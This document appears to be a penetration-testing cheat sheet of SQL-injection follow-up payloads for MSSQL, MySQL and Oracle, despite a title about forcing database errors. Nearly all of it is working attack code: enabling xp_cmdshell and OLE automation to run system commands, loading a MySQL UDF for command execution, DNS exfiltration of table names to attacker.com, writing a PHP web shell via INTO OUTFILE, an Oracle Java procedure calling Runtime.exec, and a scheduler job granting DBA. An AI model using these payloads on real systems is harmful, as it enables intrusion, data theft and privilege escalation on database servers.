⁉️ Techniques to Force Errors from Databases for SQL InjectionBelow are some advanced and rare SQL injection techniques for MSSQL, MySQL, and Oracle. These techniques go beyond the basic ones and exploit specific features and configurations of the databases.
MSSQL
OLE Automation Procedures
Copy DECLARE @Object INT ;
EXEC sp_OACreate 'WScript.Shell' , @Object OUTPUT ;
EXEC sp_OAMethod @Object, 'Run' , NULL , 'cmd.exe /c whoami > C:\output.txt' ;
This uses OLE Automation procedures to execute system commands.
XP_CMD Shell with Privilege Escalation
Copy EXEC sp_configure 'show advanced options' , 1 ;
RECONFIGURE ;
EXEC sp_configure 'xp_cmdshell' , 1 ;
RECONFIGURE ;
EXEC xp_cmdshell 'whoami' ;
This enables xp_cmdshell
to execute system commands if it's not already enabled.
Linked Servers
Copy EXEC sp_addlinkedserver 'attacker_server' ;
EXEC sp_addlinkedsrvlogin 'attacker_server' , 'false' , NULL , 'username' , 'password' ;
EXEC ( 'xp_cmdshell ''net user''' ) AT attacker_server;
This technique uses linked servers to run commands on a different server.
MySQL
UDF (User Defined Functions) for Remote Command Execution
Copy CREATE TABLE foo ( line BLOB);
INSERT INTO foo VALUES (LOAD_FILE( '/usr/lib/lib_mysqludf_sys.so' ));
SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' ;
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so' ;
SELECT sys_exec( 'id > /tmp/out; chown mysql.mysql /tmp/out' );
This technique involves creating a UDF to execute system commands.
DNS Exfiltration
Copy SELECT LOAD_FILE( CONCAT ( '\\\\' , ( SELECT table_name FROM information_schema.tables LIMIT 0 , 1 ), '.attacker.com\\a' ));
This exfiltrates data through DNS requests to an attacker-controlled domain.
Binary Log Injections
Copy SET GLOBAL general_log = 'ON' ;
SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log' ;
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php' ;
This exploits the binary log feature to write a web shell.
Oracle
Java Procedures for Command Execution
Copy EXEC dbms_java.grant_permission( 'SCOTT' , 'SYS:java.io.FilePermission' , '<<ALL FILES>>' , 'execute' );
EXEC dbms_java.grant_permission( 'SCOTT' , 'SYS:java.lang.RuntimePermission' , 'writeFileDescriptor' , '' );
EXEC dbms_java.grant_permission( 'SCOTT' , 'SYS:java.lang.RuntimePermission' , 'readFileDescriptor' , '' );
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "cmd" AS
import java.io. * ;
public class cmd {
public static String run(String cmd) {
try {
StringBuffer output = new StringBuffer();
Process p = Runtime.getRuntime(). exec (cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = "" ;
while (( line = reader.readLine()) != null ) {
output.append( line + "\n" );
}
return output.toString();
} catch (Exception e) {
return e.toString();
}
}
};
/
CREATE OR REPLACE FUNCTION run_cmd (p_cmd IN VARCHAR2 ) RETURN VARCHAR2
AS LANGUAGE JAVA
NAME 'cmd.run(java.lang.String) return java.lang.String' ;
/
SELECT run_cmd( 'id' ) FROM dual;
This uses Java stored procedures to execute system commands.
UTL_FILE Package for File Access
Copy DECLARE
l_file UTL_FILE.FILE_TYPE;
l_text VARCHAR2 ( 32767 );
BEGIN
l_file : = UTL_FILE.FOPEN( 'DIRECTORY_NAME' , 'output.txt' , 'W' );
UTL_FILE.PUT_LINE(l_file, 'Data from UTL_FILE' );
UTL_FILE.FCLOSE(l_file);
END ;
This technique uses the UTL_FILE
package to write files to the server.
DBMS_SCHEDULER for Job Execution
Copy BEGIN
DBMS_SCHEDULER.create_job(
job_name => 'job1' ,
job_type => 'PLSQL_BLOCK' ,
job_action => 'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO SCOTT''; END;' ,
start_date => SYSTIMESTAMP,
repeat_interval => NULL ,
end_date => NULL ,
enabled => TRUE
);
END ;
This uses DBMS_SCHEDULER
to execute jobs that can change database permissions.